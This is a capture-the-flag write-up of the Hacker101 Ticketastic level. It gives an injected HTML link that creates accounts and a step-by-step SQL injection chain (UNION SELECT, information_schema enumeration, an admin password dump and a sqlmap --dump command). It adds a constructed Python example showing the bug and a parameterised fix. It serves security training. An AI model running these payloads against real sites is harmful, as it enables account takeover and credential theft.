08 – Hacker 101

Tickettastic Demo & Live instance

Flag 0

  • Review the demo and take notes on how it is all set up.
  • Now view the live instance.
  • The demo and the live instance look exactly the same code-wise.
  • Admin login: try admin / admin, but it shouldn't work.
  • Jump to "Submit a ticket" and put this in the ticket to inject some HTML and see if it works:
  • <a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>
  • Now log in with the new account.
  • "Read the Flag" won't work.
  • Flag 0 found

Flag 1

  • Use Burp Suite to find the request; we will focus on ticket?id=1 and dumping the admin login creds.
  • ticket?id=1' -> the error message shows it is running a MySQL database. Let's run down a quick list.
  • Let's try this one: ticket?id=1 AND 1=1 *this one works* (no flag though), but ticket?id=1 AND 1=2 does not.
  • Let's see if we can find the number of columns. ticket?id=1 AND 1=1 ORDER BY 10 does not work, but ticket?id=1 AND 1=1 ORDER BY 3 does; ticket?id=1 AND 1=1 ORDER BY 4 errors out. So, let's UNION SELECT.
  • ticket?id=1.1 UNION SELECT 1,2,3-- shows 1, 2 (our reply), 3.
  • Let's have some fun and see if we can dump the database version.
  • ticket?id=1.1 UNION SELECT VERSION(),DATABASE(),3--
  • Now let's get a table name.
  • ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--
  • This should show 2 tables; the one we want is "users".
  • Let's dump the column names.
  • ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='users'--
  • This will dump id, username, password. Oh, we are close to admin now!
  • ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin'--
  • Flag 1 found
  • I just learned something: we could have just done this, the easier way.
  • Burp Suite > read the GET request, save it to a file and run sqlmap -r therequest.txt --dump
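An added example, not from the Hacker101 course or this write-up, showing why the ticket endpoint above was injectable and how a parameterised query with input validation closes it. The schema, column names, flag value and the use of SQLite in place of MySQL are all constructed stand-ins.

```python
import sqlite3

# Constructed stand-in for the Ticketastic schema (hypothetical column names).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tickets (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO tickets VALUES (1, 'Printer broken', 'Cannot print');
        INSERT INTO users VALUES (1, 'admin', 'FLAG{constructed-placeholder}');
    """)
    return conn

def ticket_vulnerable(conn, ticket_id):
    # The bug: whatever arrives in ?id= is pasted into the SQL text, so a quote
    # breaks the statement (the error seen above) and a UNION appends rows from
    # any other table.
    sql = "SELECT id, title, body FROM tickets WHERE id=" + ticket_id
    return conn.execute(sql).fetchall()

def ticket_safe(conn, ticket_id):
    # The fix: reject anything that is not a plain integer, then bind the value
    # as a parameter so the driver never treats it as SQL.
    if not ticket_id.isdigit():
        return []
    sql = "SELECT id, title, body FROM tickets WHERE id=?"
    return conn.execute(sql, (int(ticket_id),)).fetchall()

def compare(ticket_id):
    """Run one ?id= value through both handlers on a fresh database.
    Returns (vulnerable_result, safe_result); a database error on the
    vulnerable side is returned as an 'ERROR: ...' string."""
    conn = make_db()
    try:
        vuln = ticket_vulnerable(conn, ticket_id)
    except sqlite3.Error as exc:
        vuln = f"ERROR: {exc}"
    return vuln, ticket_safe(conn, ticket_id)

if __name__ == "__main__":
    # The probes from the write-up, in the order they were tried.
    for payload in ("1", "1'", "1 AND 1=1", "1 AND 1=2",
                    "1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin'--"):
        vuln, safe = compare(payload)
        print(f"id={payload!r}\n  vulnerable: {vuln}\n  safe:       {safe}")
```

Against the vulnerable handler the boolean probes give different answers and the UNION row carries the admin password; the safe handler returns the ticket only for a legitimate integer id and an empty result for every probe.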